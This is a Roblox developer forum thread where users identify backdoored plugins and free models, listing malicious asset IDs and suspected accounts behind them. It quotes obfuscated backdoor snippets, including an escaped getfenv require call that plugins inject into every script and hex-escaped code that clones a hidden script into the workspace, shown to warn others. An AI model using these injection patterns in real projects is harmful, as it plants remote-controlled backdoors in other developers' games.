can someone tell me anything about poseidon ss? i have no idea where it came from and it looks sketchy.
2 Likes
I looked into the script of the Poseidon script and I saw some usage of profanity. If this is something we all should worry about, then this script thing could be a threat to developers. Hopefully, we wont get banned for it.
I FOUND IT OUT
If you used the FE Gun Kit/Melee Kit theres a suspicious line in the “SimulateBulletScript”, the line is 321, with a spaced out part with a script require. I deleted this and the script GUI was removed.
This is the ID: 5770442639
And this is the account behind it all: https://www.roblox.com/users/1888346767/profile/
2 Likes
i didn’t use that model, I believe my gui is coming from HD Admin. my friend said he was messing around and didn’t remove it. when I have access to my computer I can attempt to find the one he used
That’s an openscript link, it opens the script. I’ve seen this in my game too, it would just send you to the script it originated from.
1 Like
HD Admin would not send you to something like that. The tool has only 1 require and that is for the MainModule. It could be likely that your using a fake HD Admin, the real one is developed by @ForeverHD.
That UI just looks bad, wonder why anyone would buy it, it’s most likely skidded as well, though, how did you get a picture of it?
False, the ID is 5712232911 as the one that you supplied requires a module that requires a module, and so on until it requires the one supplied
1 Like
I got the picture because it randomly started popping up in the game im developing. I couldn’t find anything about it in the explorer, as it only appeared in player gui when I ran the game. As of yesterday, it stopped appearing, no trace of it whatsoever. My only guess is that one of the other developers had a bad plugin.
1 Like
This is an amazing megathread, I’m almost positive that some Roblox Staff are going through the malicious plugins and Content Deleting them. Great work.
1 Like
Malicious: 5723263360
Original: Idk
Note: This plugin was made by the same person of some of the other malicious plugins on this thread.
Edit: I found this via the RoSync loader virus, for victims like me know what this is.
For that plugin alone, the friends of these users all look like bots. These are the only two non-bot people that are in the group that produced the malicious plugin.
Group: GizmoTjaz - Roblox --Probably trying to frame someone, actual person’s profile is here: GizmoTjaz - Roblox
DuazDaio: DuazDaio - Roblox
KaspersHub: KaspersHub - Roblox
I have a slight feeling these are stolen accounts, but I’m not sure.
Note: KaspersHub is also in a lot of other groups with similar logos.
I’m pretty sure it’s a backdoor group (and the bot accounts are possibly alts?)
Most likely, but the users I mentioned specifically have robux. I think they were stolen and then linked to all these bot accounts. Whoever did this was really good in covering their tracks. there are hundreds of bots.
1 Like
plugin checks for any and all scripts in the game and places multiple lines of requirements saying this
getfenv()[‘\114\101\113\117\105\114\101’][5151855975]
Malicious plugin: 6173331887
Original plugin: 866972013
I found another malicious plugin:
Real plugin (ID:6426578337) :
Fake Plugin (ID: 6427852822):
The fake plugin contains some malicious code:
workspace:WaitForChild("\0x54\0x65\0x72\0x72\0x61\0x69\0x6e"):FindFirstChild('\0x47\0x72\0x61\0x73\0x73\0x46\0x58')then a=script:WaitForChild("\0x47\0x72\0x61\0x73\0x73\0x46\0x58"):Clone()a.Parent=workspace:WaitForChild("\0x43\0x61\0x6d\0x65\0x72\0x61")a.Disabled=false;end
And also I found GrassFX script inside of the fake plugin:
And the code sample from the GrassFX script:
Thank you so much, this helped me out a LOT!
This is a virus: Smooth Cam - Roblox
the string is base64 for the into of The Prince of Belair
contains bytecode interpreters
1 Like